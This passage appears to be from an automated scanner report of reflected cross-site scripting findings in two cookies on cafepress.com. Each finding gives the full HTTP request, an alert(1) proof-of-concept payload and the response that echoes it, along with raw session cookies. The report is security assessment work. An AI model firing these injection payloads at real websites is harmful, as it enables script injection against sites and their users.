{}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '6774f</script><script>alert(1)</script>147c0c0a55c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a17"-alert(1)-"1b71678a13 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59006 Date: Sun, 26 Dec 2010 13:49:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59006 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65868</script><script>alert(1)</script>67d717b073a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=65868</script><script>alert(1)</script>67d717b073a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59029 Date: Sun, 26 Dec 2010 13:49:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59029 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '65868</script><script>alert(1)</script>67d717b073a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.56. http://www.cafepress.com/+posters [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ddf8"-alert(1)-"05b70d2df26 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 65624 Date: Sun, 26 Dec 2010 13:47:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.57. http://www.cafepress.com/+posters [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c66</script><script>alert(1)</script>78957873d50 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c0c66</script><script>alert(1)</script>78957873d50 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 65646 Date: Sun, 26 Dec 2010 13:47:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'c0c66</script><script>alert(1)</script>78957873d50 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a90"-alert(1)-"b637a8bd2b7 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59457 Date: Sun, 26 Dec 2010 13:49:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59457 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71ca1</script><script>alert(1)</script>6e6e4d328ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=71ca1</script><script>alert(1)</script>6e6e4d328ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 